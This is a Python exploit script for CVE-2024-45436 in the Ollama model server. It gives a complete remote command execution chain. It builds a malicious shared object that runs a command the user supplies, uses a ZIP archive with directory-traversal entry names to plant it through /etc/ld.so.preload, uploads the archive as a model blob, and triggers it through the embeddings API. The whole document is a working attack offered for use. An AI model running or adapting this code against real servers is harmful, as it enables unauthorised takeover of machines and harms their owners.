#!/usr/bin/env python3 import argparse import hashlib import json import os import subprocess import zipfile import requests import sys from urllib.parse import urlparse # Payload template for the malicious shared object CODE = """#include #include #include void __attribute__((constructor)) myInitFunction() { const char *f1 = "/etc/ld.so.preload"; const char *f2 = "/tmp/hook.so"; unlink(f1); unlink(f2); system("bash -c '%s'"); }""" def print_status(message, is_error=False): """Print colored status messages""" if is_error: print(f"\033[91m[!] {message}\033[0m") else: print(f"\033[94m[+] {message}\033[0m") def format_url(url): """Format and validate the URL""" if not url.startswith(('http://', 'https://')): url = 'http://' + url parsed_url = urlparse(url) return f"{parsed_url.scheme}://{parsed_url.netloc}" def check_vulnerability(target_url): """Check if the target is vulnerable""" try: res = requests.get(f"{target_url}/api/version", timeout=5) if res.status_code != 200: return False json_data = res.json() if "version" not in json_data: return False # Check if version is less than 0.1.47 v1 = list(map(int, json_data["version"].split('.'))) v2 = list(map(int, "0.1.47".split('.'))) for num1, num2 in zip(v1, v2): if num1 < num2: return True elif num1 > num2: return False return len(v1) < len(v2) except: return False def create_malicious_so(cmd): """Generate malicious shared object file""" code = CODE % cmd with open('tmp.c', 'w') as f: f.write(code) try: subprocess.run(['gcc', 'tmp.c', '-o', 'hook.so', '-fPIC', '-shared', '-ldl', '-D_GNU_SOURCE'], check=True, stderr=subprocess.PIPE) return True except subprocess.CalledProcessError as e: print_status(f"Failed to compile hook.so: {e.stderr.decode()}", True) return False def create_malicious_zip(): """Create ZIP file with directory traversal for payload delivery""" try: with zipfile.ZipFile('evil.zip', 'w') as zipf: zipf.writestr('../../../../../../../../../../etc/ld.so.preload', '/tmp/hook.so') with open('hook.so', 'rb') as so_file: zipf.writestr('../../../../../../../../../../tmp/hook.so', so_file.read()) return True except Exception as e: print_status(f"Failed to create ZIP: {str(e)}", True) return False def upload_payload(target_url): """Upload the payload blob""" try: with open('evil.zip', 'rb') as f: file_content = f.read() h = hashlib.sha256() h.update(file_content) blob_name = f"sha256:{h.hexdigest()}" f.seek(0) res = requests.post(f"{target_url}/api/blobs/{blob_name}", data=f, timeout=10) if res.status_code != 201: print_status(f"Warning: Blob upload returned status {res.status_code}", True) return blob_name except Exception as e: print_status(f"Failed to upload blob: {str(e)}", True) return None def create_model(target_url, blob_path): """Create a model that references the malicious blob""" try: json_content = json.dumps({"name": "test", "modelfile": f"FROM /root/.ollama/models/blobs/{blob_path}"}) res = requests.post( f"{target_url}/api/create", headers={'Content-Type': 'application/json'}, data=json_content, timeout=10 ) return res.status_code == 200 except Exception as e: print_status(f"Failed to create model: {str(e)}", True) return False def trigger_execution(target_url): """Trigger code execution through embeddings API""" model = "all-minilm:22m" for i in range(3): print_status(f"Execution attempt {i+1}/3...") try: json_content = json.dumps({"model": model, "keep_alive": 0}) res = requests.post( f"{target_url}/api/embeddings", headers={'Content-Type': 'application/json'}, data=json_content, timeout=15 ) if res.status_code == 200: print_status("Execution successful") return True except Exception: pass # Pull the model if it's not available try: print_status("Pulling required model, please wait...") json_content = json.dumps({"name": model}) res = requests.post( f"{target_url}/api/pull", headers={'Content-Type': 'application/json'}, data=json_content, timeout=120 # Allow longer timeout for model pull ) except: continue return False def cleanup(): """Clean up temporary files""" for f in ['tmp.c', 'hook.so', 'evil.zip']: if os.path.exists(f): try: os.remove(f) except: pass def main(): parser = argparse.ArgumentParser(description='Ollama CVE-2024-45436 Remote Command Execution Exploit') parser.add_argument('target', help='Target URL (e.g. http://example.com:11434)') parser.add_argument('command', help='Command to execute on the target') parser.add_argument('--no-cleanup', action='store_true', help='Do not remove temporary files') args = parser.parse_args() print("\n=== Ollama CVE-2024-45436 Exploit ===\n") # Format and validate the URL target_url = format_url(args.target) print_status(f"Target: {target_url}") print_status(f"Command: {args.command}") # Check if target is vulnerable print_status("Checking if target is vulnerable...") if not check_vulnerability(target_url): print_status("Target does not appear to be vulnerable", True) sys.exit(1) print_status("Target is vulnerable!") # Create malicious shared object print_status("Creating malicious shared object...") if not create_malicious_so(args.command): print_status("Failed to create shared object", True) cleanup() sys.exit(1) # Create malicious ZIP print_status("Creating ZIP payload...") if not create_malicious_zip(): print_status("Failed to create ZIP payload", True) cleanup() sys.exit(1) # Upload payload print_status("Uploading payload...") blob_name = upload_payload(target_url) if not blob_name: print_status("Failed to upload payload", True) cleanup() sys.exit(1) print_status(f"Payload uploaded: {blob_name}") # Create model with payload print_status("Creating model...") if not create_model(target_url, blob_name.replace(':', '-')): print_status("Failed to create model", True) cleanup() sys.exit(1) # Trigger execution print_status("Triggering exploitation...") success = trigger_execution(target_url) # Clean up if not args.no_cleanup: print_status("Cleaning up temporary files...") cleanup() if success: print("\n\033[92m[✓] Exploit completed successfully!\033[0m") else: print("\n\033[91m[✗] Exploit may have failed. Check if your command executed.\033[0m") print("\033[93m Note: Some commands may execute silently. Check your listener if applicable.\033[0m") print("\n=== Exploit finished ===\n") if __name__ == "__main__": main()